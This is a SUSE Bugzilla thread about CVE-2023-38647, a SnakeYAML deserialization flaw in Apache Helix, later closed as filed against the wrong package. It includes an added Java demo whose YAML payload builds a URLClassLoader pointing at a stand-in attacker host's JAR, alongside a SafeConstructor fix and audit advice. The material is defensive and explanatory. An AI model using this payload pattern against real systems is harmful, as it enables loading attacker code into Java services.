[Bug 1213660] New: VUL-0: CVE-2023-38647: helix: Deserialization vulnerability in Helix workflow and REST
https://bugzilla.suse.com/show_bug.cgi?id=1213660

Bug ID: 1213660
Summary: VUL-0: CVE-2023-38647: helix: Deserialization vulnerability in Helix workflow and REST
Classification: openSUSE
Product: openSUSE Distribution
Version: Leap 15.5
Hardware: Other
URL: https://smash.suse.de/issue/373380/
OS: Other
Status: NEW
Severity: Normal
Priority: P5 - None
Component: Other
Assignee: socvirnyl.estela@gmail.com
Reporter: gianluca.gabrielli@suse.com
QA Contact: qa-bugs@suse.de
Target Milestone: ---
Found By: ---
Blocker: ---

Posted by Junkai Xue on Jul 25

Severity: important

Affected versions:
- Apache Helix through 1.2.0

Description:
An attacker can use SnakeYAML to deserialize java.net.URLClassLoader and make it load a JAR from a specified URL, and then deserialize javax.script.ScriptEngineManager to load code using that ClassLoader. This unbounded deserialization can likely lead to remote code execution. The code can be run in Helix REST start and Workflow creation. Affect all the...

References:
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2023-38647
https://seclists.org/oss-sec/2023/q3/73

--
You are receiving this mail because: You are on the CC list for the bug.
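The advisory quoted above describes the first step of the chain: a SnakeYAML document whose global tags name arbitrary JVM classes, which the default Constructor happily instantiates. The following is an added illustration written for this page, not code from Apache Helix, from the advisory, or from the bug report. It loads a constructed document with SnakeYAML's default Constructor (which yields a java.net.URLClassLoader pointed at a placeholder URL under the reserved .invalid TLD, so nothing is fetched) and then with SafeConstructor, which rejects the tag. It assumes SnakeYAML 1.33 or a later 1.x release on the classpath; in SnakeYAML 2.x the default LoaderOptions already refuse global tags, and the SafeConstructor(LoaderOptions) constructor is the one that survives there. The second step of the chain (javax.script.ScriptEngineManager loading code through that ClassLoader) is deliberately not reproduced.

```java
import org.yaml.snakeyaml.LoaderOptions;
import org.yaml.snakeyaml.Yaml;
import org.yaml.snakeyaml.constructor.SafeConstructor;
import org.yaml.snakeyaml.error.YAMLException;

public class SnakeYamlDeserializationDemo {

    // Constructed sample document (not from the advisory). The !! tags name JVM
    // classes; with the default Constructor a tagged sequence is matched against a
    // public constructor with the same arity, so this builds
    // new URLClassLoader(new URL[]{ new URL("http://attacker.invalid/evil.jar") }).
    // The placeholder host is unresolvable and no class is ever requested from it.
    static final String UNTRUSTED_YAML =
        "!!java.net.URLClassLoader [[!!java.net.URL [\"http://attacker.invalid/evil.jar\"]]]";

    // Vulnerable pattern: the default Constructor honours global tags, so the
    // document author decides which classes get instantiated.
    static Object loadUnsafe(String yaml) {
        return new Yaml().load(yaml);
    }

    // Hardened pattern: SafeConstructor only builds the standard YAML types
    // (maps, sequences, scalars) and throws on any tag it does not know.
    static Object loadSafe(String yaml) {
        return new Yaml(new SafeConstructor(new LoaderOptions())).load(yaml);
    }

    public static void main(String[] args) {
        Object unsafe = loadUnsafe(UNTRUSTED_YAML);
        // Expected: java.net.URLClassLoader, i.e. an attacker-chosen class was built.
        System.out.println("default Constructor produced: " + unsafe.getClass().getName());

        try {
            loadSafe(UNTRUSTED_YAML);
            System.out.println("SafeConstructor accepted the document (unexpected)");
        } catch (YAMLException e) {
            // Expected: a ConstructorException along the lines of
            // "could not determine a constructor for the tag
            //  tag:yaml.org,2002:java.net.URLClassLoader"
            System.out.println("SafeConstructor rejected the document: " + e.getMessage());
        }
    }
}
```

When auditing a Java code base for this class of bug, the thing to grep for is any `new Yaml()` or `new Yaml(new Constructor(...))` that is fed data from a request body, a config file a remote user can influence, or a workflow definition; every such site should use SafeConstructor (or, on SnakeYAML 2.x, an explicit TagInspector allow-list) unless the input is trusted by construction.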
https://bugzilla.suse.com/show_bug.cgi?id=1213660

Maintenance Automation <maint-coord+maintenance-robot@suse.de> changed:

What     |Removed   |Added
----------------------------------
Priority |P5 - None |P3 - Medium
https://bugzilla.suse.com/show_bug.cgi?id=1213660#c1

Soc Virnyl Estela <socvirnyl.estela@gmail.com> changed:

What       |Removed |Added
----------------------------------
Resolution |---     |INVALID
Status     |NEW     |RESOLVED

--- Comment #1 from Soc Virnyl Estela <socvirnyl.estela@gmail.com> ---
This is for Apache Helix and not the Helix editor.
https://bugzilla.suse.com/show_bug.cgi?id=1213660#c2

--- Comment #2 from Gianluca Gabrielli <gianluca.gabrielli@suse.com> ---
Thanks for having pointed this out, I'm sorry for the confusion.